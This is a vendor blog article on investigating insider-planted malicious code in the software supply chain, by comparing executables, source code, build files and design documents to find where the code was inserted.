Having malicious code detection strategies in place is critical to keeping your software supply chain secure.
Let’s imagine you discover a string of suspicious code within one of your applications. Perhaps a routine scan by your application testing team finds a point of interest that indicates malicious code, such as a time bomb or back door, has been inserted by a malicious insider within your software supply chain.
First, you breathe a huge sigh of relief that you found the problem before it caused any lasting damage (data theft, log keystrokes, money siphoning, or some other subverted functions of the application).
But then you think, if someone inserted malicious code into one application, what’s to stop them from targeting another?
You need to unmask the culprit.
Malicious code can be injected into an executable as early as the development of an open source component, and as late as the final production build, which means your adversary could be anyone within your software supply chain.
Your suspect list includes people with the necessary access or ability to insert malicious code.
Analysis of the executable alone will not provide enough information to narrow down the list of potential suspects. For that type of detection work, you need to get your hands on dependencies, source code, build files, and design documents. In combination, these assets can help you put together a timeline of when the malicious code was inserted. Here’s how it works.
If you find malicious code in both the executable and the source code of an application, you’ve got a strong indicator that your culprit is a developer of your proprietary code or an external dependency.
If the malicious code is not present in the source code, it could mean that the malicious code was removed from the source code before it was analyzed, or that the code was injected at a later stage in the software development life cycle (SDLC).
In order to narrow down the search, you need to take into account the location where code was obtained. If it was obtained from a repository where any code changes are tracked and from which code is retrieved for the build process, it is another strong indicator that the malicious finding was injected at a later stage in the SDLC.
Since malicious code can also be injected in an application at a stage after development, you also need to analyze build files.
For example, build files can be made to execute programs that inject malicious code at build time by adding a simple task, as shown in the following ant build file snippet:
Build files can also be configured to retrieve malicious dependencies from locations outside the build servers, as shown in the following snippets:
An insider can also replace existing dependencies in the build server’s local repository with malicious ones. During the build process, these malicious dependencies will be used even by a benign build file and will result in malicious code being injected into every application using those dependencies. The presence of malicious code in an executable where the source code and build file both appear benign points toward this case.
Keep in mind that an “insider” may not always be an employee or contractor of the impacted organization. An insider can also be someone who, through some malicious means, has gained access to the same systems and information that an employee has access to. For example, look at how attackers gained access to the SolarWinds build process to insert malicious code, which went undetected before making its way to customers.
Design documents are helpful in determining whether code that looks malicious is actually malicious. For example, consider the snippet below from a web.xml. The code shows an application that has an alternate servlet with an alternate path mapping. A design document would show if this alternate path is required by design or if it is potentially malicious.
The more information you have, the easier it will be to find the source of any insider threat. Once you believe you know the stage at which malicious code was inserted, you may have enough information to track actions to a specific individual or source, or you may need to monitor the team more closely. Keep the investigation team small so you don’t raise any flags before your suspicions are confirmed.
Mike McGuire is a senior software solutions manager at Synopsys where he has spent several years leading go-to-market efforts for open source risk and software supply chain security solutions. After beginning his career as a software engineer, Mike transitioned into product management and strategy roles, as he enjoyed interfacing with the buyers and users of the products he worked on. Leveraging several years of development experience, Mike enjoys connecting the market’s complex AppSec problems with Synopsys’ comprehensive solutions.